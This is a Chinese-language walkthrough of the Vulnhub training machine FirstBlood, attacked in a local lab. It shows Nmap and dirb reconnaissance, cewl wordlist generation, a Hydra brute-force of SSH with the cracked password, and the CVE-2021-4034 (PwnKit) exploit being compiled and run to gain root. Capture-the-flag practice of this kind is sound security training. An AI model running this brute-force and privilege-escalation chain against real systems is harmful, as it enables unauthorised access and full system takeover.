0x00 配置
攻击机 IP: 192.168.10.5
靶机 IP: 192.168.10.6
0x01 攻击
使用 Nmap 扫描靶机开放的端口
┌──(root㉿azwhikaru)-[~]
└─# nmap -A 192.168.10.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-20 07:54 CST
Nmap scan report for 192.168.10.6
Host is up (0.00030s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to FirstBlood!
| http-robots.txt: 1 disallowed entry
|_/johnnyrambo/
MAC Address: 08:00:27:EB:E9:83 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.31 ms 192.168.10.6
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.88 seconds
只发现了一个 80 (HTTP) 端口,直接看
I thought I would build a beginner box based on a comment I saw on Twitter. We all need to start somewhere!
The goal here is to guide you through the process with some nudges here and there.
For example, when we find a web page, we should also view the source - you never know what you'll find. Hit Ctrl U or right click and select View Page Source.
提示要查看网页源码,Ctrl + U 查看
<!DOCTYPE html>
<html>
<head>
<title>Welcome to FirstBlood!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to FirstBlood!</h1>
<p>I thought I would build a beginner box based on a comment I saw on Twitter. We all need to start somewhere!</p>
<p>The goal here is to guide you through the process with some nudges here and there.</p>
<p>For example, when we find a web page, we should also view the source - you never know what you'll find. Hit Ctrl U or right click and select View Page Source.</p>
</body>
<!-- What you're seeing here is an HTML comment. It's not visible on the page but you can see it when you view the source.
While I've got your attention, you should check out: /rambo.html -->
</html>
提示访问 /rambo.html
Rambo was here!
Learn to move in parallel. If you can do multiple tasks at once, you will cut down on the time it takes to get to root.
We are going to do two things at once. First, we're going to run a port scan and we're going to do a cursory scan on the web port.
Replacing the following IP with the IP of your target, if we run:
nmap 192.168.86.132
We should only see port 80 open.
However, if we run:
nmap -p- 192.168.86.132
We should find another port.
While that longer scan is running, and replacing the following IP with the IP of your target, we're going to run Nikto against the web port using the following syntax:
nikto -h http://192.168.86.132
Read the output carefully, it will point you to another directory.
提示要用 "nmap -p-" 扫描,"-p-" 参数指示 Nmap 扫描所有的 TCP 端口
┌──(root㉿azwhikaru)-[~]
└─# nmap -p- 192.168.10.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-20 07:55 CST
Nmap scan report for 192.168.10.6
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
60022/tcp open unknown
MAC Address: 08:00:27:EB:E9:83 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.65 seconds
又扫到一个 60022 端口,不过并没有描述。刚才的提示里还写了要扫描网站目录,继续扫描
┌──(root㉿azwhikaru)-[~]
└─# dirb http://192.168.10.6/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Feb 20 07:56:42 2023
URL_BASE: http://192.168.10.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.10.6/ ----
+ http://192.168.10.6/robots.txt (CODE:200|SIZE:39)
-----------------
END_TIME: Mon Feb 20 07:56:44 2023
DOWNLOADED: 4612 - FOUND: 1
扫到了 robots.txt
User-agent: *
Disallow: /johnnyrambo/
访问这个目录
提示我们需要用 cewl 工具抓取这个网站来生成字典
┌──(root㉿azwhikaru)-[/home/azwhikaru/Desktop]
└─# cewl -w words.txt -d 1 -m 5 http://192.168.10.6/johnnyrambo/
CeWL 5.5.2 (Grouping) Robin Wood ([email protected]) (https://digi.ninja/)
生成完毕之后,用 hydra 工具爆破 SSH
┌──(root㉿azwhikaru)-[/home/azwhikaru/Desktop]
└─# hydra -l johnny -P words.txt ssh://192.168.10.6:60022 -t 4
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-20 08:09:54
[DATA] max 4 tasks per 1 server, overall 4 tasks, 137 login tries (l:1/p:137), ~35 tries per task
[DATA] attacking ssh://192.168.10.6:60022/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 93 to do in 00:03h, 4 active
[STATUS] 32.00 tries/min, 64 tries in 00:02h, 73 to do in 00:03h, 4 active
[STATUS] 33.67 tries/min, 101 tries in 00:03h, 36 to do in 00:02h, 4 active
[60022][ssh] host: 192.168.10.6 login: johnny password: Vietnam
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-20 08:13:28
登录 Shell 之后,在 home 目录找到 flag,再用 CVE-2021-4034 提权获得 root flag
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
New release '20.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Feb 19 16:22:15 2023 from 192.168.10.5
/usr/bin/xauth: file /home/johnny/.Xauthority does not exist
johnny@firstblood:~$ cd CVE-2021-4034-main/
johnny@firstblood:~/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
johnny@firstblood:~/CVE-2021-4034-main$ ./cve-2021-4034
# ls /root
README.txt
# cat /root/README.md
cat: /root/README.md: No such file or directory
# cat /root/README.txt
______ _ _ ______ _ _
| ___(_) | | | ___ \ | | |
| |_ _ _ __ ___| |_| |_/ / | ___ ___ __| |
| _| | | '__/ __| __| ___ \ |/ _ \ / _ \ / _` |
| | | | | \__ \ |_| |_/ / | (_) | (_) | (_| |
\_| |_|_| |___/\__\____/|_|\___/ \___/ \__,_|
____ ______ _ _ ____
\ \ \ | ___ \ | | | | / / /
\ \ \ | |_/ /___ ___ | |_ ___ __| | / / /
> > > | // _ \ / _ \| __/ _ \/ _` | < < <
/ / / | |\ \ (_) | (_) | || __/ (_| | \ \ \
/_/_/ \_| \_\___/ \___/ \__\___|\__,_| \_\_\
I hope you enjoyed this box. I wanted to create something
on the easier side because I know how frustrating and
rewarding the process can be. If you liked this box
please reach out to me on Twitter and let me know:
@iamv1nc3nt
0x02 总结
引导性质的教程
标签:__,http,10.6,192.168,FIRSTBLOOD,Vulnhub,___,root From: https://www.cnblogs.com/azwhikaru/p/17136519.html